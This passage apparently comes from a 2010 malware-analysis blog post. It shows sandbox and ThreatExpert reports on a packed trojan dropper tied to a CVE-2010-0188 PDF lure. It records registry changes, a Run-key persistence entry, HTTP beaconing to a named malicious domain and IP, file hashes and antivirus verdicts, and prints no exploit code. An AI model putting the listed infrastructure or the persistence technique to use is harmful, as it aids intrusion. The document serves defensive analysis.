             Value Name: [ LibraryPath ], Value: [ %SystemRoot%\System32\winrnr.dll ], 2 times
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ], 
             Value Name: [ ProviderId ], Value: [ 0xee37263b80e5cf11a55500c04fd8d4ac ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ], 
             Value Name: [ StoresServiceClassInfo ], Value: [ 0 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ], 
             Value Name: [ SupportedNameSpace ], Value: [ 32 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ], 
             Value Name: [ Version ], Value: [ 0 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ], 
             Value Name: [ DisplayString ], Value: [ Network Location Awareness (NLA) Namespace ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ], 
             Value Name: [ Enabled ], Value: [ 1 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ], 
             Value Name: [ LibraryPath ], Value: [ %SystemRoot%\System32\mswsock.dll ], 2 times
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ], 
             Value Name: [ ProviderId ], Value: [ 0x3a244266a83ba64abaa52e0bd71fdd83 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ], 
             Value Name: [ StoresServiceClassInfo ], Value: [ 0 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ], 
             Value Name: [ SupportedNameSpace ], Value: [ 15 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ], 
             Value Name: [ Version ], Value: [ 0 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 ], 
             Value Name: [ Next_Catalog_Entry_ID ], Value: [ 1012 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 ], 
             Value Name: [ Num_Catalog_Entries ], Value: [ 11 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 ], 
             Value Name: [ Serial_Access_Num ], Value: [ 4 ], 2 times
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001 ], 
             Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002 ], 
             Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003 ], 
             Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004 ], 
             Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\rsvpsp.d ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005 ], 
             Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\rsvpsp.d ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006 ], 
             Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007 ], 
             Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008 ], 
             Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009 ], 
             Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010 ], 
             Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011 ], 
             Value Name: [ PackedCatalogItem ], Value: [ %SystemRoot%\system32\mswsock. ], 1 time
        Key: [ HKLM\System\Setup ], 
             Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 3 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Environment ], 
             Value Name: [ TEMP ], Value: [ %USERPROFILE%\Local Settings\Temp ], 4 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Environment ], 
             Value Name: [ TMP ], Value: [ %USERPROFILE%\Local Settings\Temp ], 4 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ], 
             Value Name: [ EnableHttp1_1 ], Value: [ 1 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ], 
             Value Name: [ EnableNegotiate ], Value: [ 1 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ], 
             Value Name: [ MimeExclusionListForCache ], Value: [ multipart/mixed multipart/x-mixed-replace multipart/x-byteranges  ], 4 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ], 
             Value Name: [ WarnOnPost ], Value: [ 0x01000000 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ], 
             Value Name: [ ParseAutoexec ], Value: [ 1 ], 2 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], 
             Value Name: [ AppData ], Value: [ %USERPROFILE%\Application Data ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], 
             Value Name: [ Cache ], Value: [ %USERPROFILE%\Local Settings\Temporary Internet Files ], 3 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], 
             Value Name: [ Cookies ], Value: [ %USERPROFILE%\Cookies ], 3 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], 
             Value Name: [ History ], Value: [ %USERPROFILE%\Local Settings\History ], 3 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], 
             Value Name: [ Local Settings ], Value: [ %USERPROFILE%\Local Settings ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], 
             Value Name: [ Personal ], Value: [ %USERPROFILE%\My Documents ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache ], 
             Value Name: [ Signature ], Value: [ Client UrlCache MMF Ver 5.2 ], 2 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content ], 
             Value Name: [ CacheLimit ], Value: [ 163410 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content ], 
             Value Name: [ CachePrefix ], Value: [  ], 2 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content ], 
             Value Name: [ PerUserItem ], Value: [ 1 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies ], 
             Value Name: [ CacheLimit ], Value: [ 8192 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies ], 
             Value Name: [ CachePrefix ], Value: [ Cookie: ], 2 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies ], 
             Value Name: [ PerUserItem ], Value: [ 1 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History ], 
             Value Name: [ CacheLimit ], Value: [ 8192 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History ], 
             Value Name: [ CachePrefix ], Value: [ Visited: ], 2 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History ], 
             Value Name: [ PerUserItem ], Value: [ 1 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ], 
             Value Name: [ IntranetName ], Value: [ 1 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ], 
             Value Name: [ ProxyBypass ], Value: [ 1 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\ ], 
             Value Name: [ http ], Value: [ 3 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 ], 
             Value Name: [ Flags ], Value: [ 33 ], 2 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 ], 
             Value Name: [ Flags ], Value: [ 219 ], 2 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 ], 
             Value Name: [ Flags ], Value: [ 71 ], 2 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 ], 
             Value Name: [ 1A10 ], Value: [ 1 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 ], 
             Value Name: [ Flags ], Value: [ 1 ], 2 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 ], 
             Value Name: [ Flags ], Value: [ 3 ], 2 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings ], 
             Value Name: [ MigrateProxy ], Value: [ 1 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings ], 
             Value Name: [ ProxyEnable ], Value: [ 0 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections ], 
             Value Name: [ DefaultConnectionSettings ], Value: [ 0x3c0000000200000009000000000000000000000000000000000000000000 ], 2 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections ], 
             Value Name: [ SavedLegacySettings ], Value: [ 0x3c0000000400000009000000000000000000000000000000000000000000 ], 4 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], 
             Value Name: [ APPDATA ], Value: [ C:\Documents and Settings\Administrator\Application Data ], 4 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], 
             Value Name: [ CLIENTNAME ], Value: [  ], 4 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], 
             Value Name: [ HOMEDRIVE ], Value: [ C: ], 4 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], 
             Value Name: [ HOMEPATH ], Value: [ \Documents and Settings\Administrator ], 4 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], 
             Value Name: [ HOMESHARE ], Value: [  ], 4 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], 
             Value Name: [ LOGONSERVER ], Value: [ \\PC ], 4 times
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], 
             Value Name: [ SESSIONNAME ], Value: [ Console ], 4 times

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Monitored Registry Keys:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ], 
             Watch subtree: [ 0 ], Notify Filter: [ Attributes Change,Value Change,Security Descriptor Change ], 2 times
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 ], 
             Watch subtree: [ 0 ], Notify Filter: [ Key Change ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 ], 
             Watch subtree: [ 0 ], Notify Filter: [ Key Change ], 1 time

[=============================================================================]
    3.b) cisvc.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Files Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File Name: [ C:\Documents and Settings\Administrator\KB958544.log ]
        File Name: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\WDUF49AN\localstart[1].htm ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File Name: [ C:\Documents and Settings\Administrator\KB958544.log ]
        File Name: [ PIPE\lsarpc ]
        File Name: [ c:\autoexec.bat ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File Name: [ C:\Documents and Settings\Administrator\KB958544.log ]
        File Name: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\WDUF49AN\localstart[1].htm ]
        File Name: [ PIPE\lsarpc ]
        File Name: [ \Device\Afd\Endpoint ]
        File Name: [ \Device\RasAcd ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 16 times

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Device Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File: [ \Device\KsecDD ], Control Code: [ 0x00390008 ], 8 times
        File: [ \Device\Afd\Endpoint ], Control Code: [ AFD_GET_INFO (0x0001207B) ], 2 times
        File: [ \Device\Afd\Endpoint ], Control Code: [ AFD_SET_CONTEXT (0x00012047) ], 14 times
        File: [ \Device\Afd\Endpoint ], Control Code: [ AFD_BIND (0x00012003) ], 2 times
        File: [ \Device\Afd\Endpoint ], Control Code: [ AFD_GET_TDI_HANDLES (0x00012037) ], 4 times
        File: [ \Device\Afd\Endpoint ], Control Code: [ AFD_GET_SOCK_NAME (0x0001202F) ], 2 times
        File: [ \Device\Afd\Endpoint ], Control Code: [ AFD_CONNECT (0x00012007) ], 2 times
        File: [ unnamed file ], Control Code: [ 0x00120028 ], 2 times
        File: [ \Device\Afd\Endpoint ], Control Code: [ AFD_SEND (0x0001201F) ], 2 times
        File: [ \Device\Afd\Endpoint ], Control Code: [ AFD_RECV (0x00012017) ], 2 times

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File Name: [ C:\WINDOWS\System32\mswsock.dll ]
        File Name: [ C:\WINDOWS\System32\wshtcpip.dll ]
        File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ]
        File Name: [ C:\WINDOWS\WindowsShell.Manifest ]
        File Name: [ C:\WINDOWS\system32\DNSAPI.dll ]
        File Name: [ C:\WINDOWS\system32\RASAPI32.DLL ]
        File Name: [ C:\WINDOWS\system32\TAPI32.dll ]
        File Name: [ C:\WINDOWS\system32\WININET.DLL ]
        File Name: [ C:\WINDOWS\system32\WINMM.dll ]
        File Name: [ C:\WINDOWS\system32\WS2HELP.dll ]
        File Name: [ C:\WINDOWS\system32\WS2_32.dll ]
        File Name: [ C:\WINDOWS\system32\comctl32.dll ]
        File Name: [ C:\WINDOWS\system32\hnetcfg.dll ]
        File Name: [ C:\WINDOWS\system32\rasadhlp.dll ]
        File Name: [ C:\WINDOWS\system32\rasman.dll ]
        File Name: [ C:\WINDOWS\system32\rtutils.dll ]
        File Name: [ C:\WINDOWS\system32\sensapi.dll ]
        File Name: [ C:\WINDOWS\system32\shell32.dll ]
        File Name: [ C:\WINDOWS\system32\urlmon.dll ]
        File Name: [ C:\WINDOWS\system32\wsock32.dll ]

[=============================================================================]
    3.c) cisvc.exe - Network Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    DNS Queries:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Name: [ trading.armed.us ], Query Type: [ DNS_TYPE_A ],
            Query Result: [ 202.134.237.59 ], Successful: [ YES ], Protocol: [ udp ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    HTTP Conversations:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        From ANUBIS:1038 to 202.134.237.59:80 - [ trading.armed.us ]
             Request: [ GET /localstart.html ], Response: [ 200 "OK" ]
        From ANUBIS:1039 to 202.134.237.59:80 - [ trading.armed.us ]
             Request: [ GET /localstart.html ], Response: [ 206 "Partial Content" ]

[#############################################################################]
                       International Secure Systems Lab                        
                            http://www.iseclab.org

Vienna University of Technology     Eurecom France            UC Santa Barbara
http://www.tuwien.ac.at          http://www.eurecom.fr  http://www.cs.ucsb.edu

Contact: anubis@iseclab.org

A few interesting changes from the Anubis analysis
http://anubis.iseclab.org/?action=result&task_id=161ab6f77e4f50384cd3bf260e71d3a26
Files Renamed: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Old File Name: [ C:\939b752657.exe ], New File Name: [ C:\Documents and Settings\Administrator\cisvc.exe ]
Registry Values Modified:
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ], Value Name: [ ProxyBypass ], New Value: [ 1 ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows
\CurrentVersion\Internet Settings ], Value Name: [ ProxyEnable ], New Value: [ 0
Registry Values created
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
SystemService = "%UserProfile%\cisvc.exe"

Files Created (downloaded):
File Name: [ C:\Documents and Settings\Administrator\KB958544.log ] File Name: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\WDUF49AN\localstart[1].htm ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
DNS Queries: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Name: [ trading.armed.us ], Query Type: [ DNS_TYPE_A ], Query Result: [ 202.134.237.59 ], Successful: [ YES ], Protocol: [ udp ] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
HTTP Conversations: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] From ANUBIS:1038 to 202.134.237.59:80 - [ trading.armed.us ] Request: [ GET /localstart.html ], Response: [ 200 "OK" ] From ANUBIS:1039 to 202.134.237.59:80 - [ trading.armed.us ] Request: [ GET /localstart.html ], Response: [ 206 "Partial Content" ]

Anubis Pcap - download

Vicheck pcap

Domains used

trading.armed.us 202.134.237.59:80

freetrade.allowed.org

Screeshot from Robtex.com

File name: 939b7526572f0c128c0cda9baed7f8a3.
http://www.virustotal.com/file-scan/report.html?id=23e7e286cd8e18e42b02172dba48956a5358c7a78743dff97ba80c0a609a1eae-1281416834
Submission date: 2010-08-10 07:07:14 (UTC)
Result: 25 /42 (59.5%)
AntiVir 8.2.4.34 2010.08.09 TR/Crypt.NSPI.Gen
Authentium 5.2.0.5 2010.08.10 W32/Heuristic-210!Eldorado
AVG 9.0.0.851 2010.08.09 Generic15.AZAH
BitDefender 7.2 2010.08.10 DeepScan:Generic.Malware.Sdld!!.F74D3917
CAT-QuickHeal 11.00 2010.08.10 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.08.10 PUA.Packed.NPack-2
Comodo 5702 2010.08.10 Heur.Pck.NsPacK
Emsisoft 5.0.0.36 2010.08.10 Trojan-Dropper.Agent!IK
eSafe 7.0.17.0 2010.08.09 Suspicious File
F-Prot 4.6.1.107 2010.08.09 W32/Heuristic-210!Eldorado
F-Secure 9.0.15370.0 2010.08.10 DeepScan:Generic.Malware.Sdld!!.F74D3917
GData 21 2010.08.10 DeepScan:Generic.Malware.Sdld!!.F74D3917
Ikarus T3.1.1.87.0 2010.08.10 Trojan-Dropper.Agent
Jiangmin 13.0.900 2010.08.10 Trojan/Scar.xcv
Kaspersky 7.0.0.125 2010.08.10 Heur.Trojan.Generic
McAfee 5.400.0.1158 2010.08.10 Suspect-D!939B7526572F
McAfee-GW-Edition 2010.1 2010.08.09 Heuristic.LooksLike.Win32.Suspicious.J!85
Norman 6.05.11 2010.08.09 W32/Packed_Nspack.A
Panda 10.0.2.7 2010.08.10 Suspicious file
Sophos 4.56.0 2010.08.10 Mal/Packer
Sunbelt 6710 2010.08.10 Packer.NSAnti.Gen (v)
Symantec 20101.1.1.7 2010.08.09 Suspicious.MH690.A
TheHacker 6.5.2.1.341 2010.08.10 W32/Behav-Heuristic-063
TrendMicro 9.120.0.1004 2010.08.10 PAK_Generic.005
VirusBuster 5.0.27.0 2010.08.09 Packed/NSPack

Hostname:    202.134.237.59
ISP:    AINS, Internet Service Provider
Organization:    AINS, Internet Service Provider
Type:    Dial-up
Assignment:    Static IP
Country:    Australia
State/Region:    New South Wales
City:    Sydney

Robtex blacklist of 202.134.237.59

Threatexpert results of jackjon.exe = cisvc.exe = setup.exe = 939b7526572f0c128c0cda9baed7f8a3.
http://www.threatexpert.com/report.aspx?md5=939b7526572f0c128c0cda9baed7f8a3

          o Submitted sample:
                + File MD5: 0x939B7526572F0C128C0CDA9BAED7F8A3
                + File SHA-1: 0xEEBE799A4B3AC5AF14A57BE73C1FECDE159CA652
                + Filesize: 7,763 bytes
                + Alias & packer info:
                      # Suspicious.MH690 [Symantec]
                      # Mal/Packer [Sophos]
                      # Trojan-Dropper.Agent [Ikarus]
                      # packed with: NSPack [Kaspersky Lab]

Technical Details:
     File System Modifications
    * The following files were created in the system:
#    Filename(s)    File Size    File Hash    Alias
1     %UserProfile%\KB958544.log     295 bytes     MD5: 0xFB5D40BB8024EA6C049A204EA883C030
SHA-1: 0x6D7E4E893D50356F756495F186B5880F1DE3348E     (not available)

2     %Temp%\setup.exe     7,763 bytes     MD5: 0x939B7526572F0C128C0CDA9BAED7F8A3
SHA-1: 0xEEBE799A4B3AC5AF14A57BE73C1FECDE159CA652     Suspicious.MH690 [Symantec]

Mal/Packer [Sophos]
Trojan-Dropper.Agent [Ikarus]
packed with NSPack [Kaspersky Lab]

    * Attention! The following process was intentionally hidden from the user:
Process Name    Main Module Size
UserNa    28,672 bytes
     Registry Modifications
    * The newly created Registry Value is:
          o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
                + SystemService = "%UserProfile%\cisvc.exe"

Contents of %UserProfile%\KB958544.log

[KB958544.log]
1.328: ===============================
1.328: 20100810235154 .109 (local)
1.328 c:\update\H1ZqbGwGGwQBSFxbR0ZFVkhJT1JPTUiutLusyOrh6Lqn4v/hjY6vkLGSs5S1lreYuZq7nL2ev6CBooOkhaaHqImqi6yNro+wka6ztLK3t7g=\update.exe (version 6.3.5.1)
2.343: Update.exe extended error code = 0xf001

CREATED FILE 4

program.pdf=407236f7f989210fa64630b5ac501d94.pdf:156771 bytes

Virustotal 0/43 http://www.virustotal.com/file-scan/report.html?id=5d43495992afe101f52dfd77eedaaa4852e96870cc6e808ad94f524ce852402b-1281347329

Pages

Wednesday, August 11, 2010

Aug 3 CVE-2010-0188 PDF Asian Regionalism and US Policy

No comments:

Post a Comment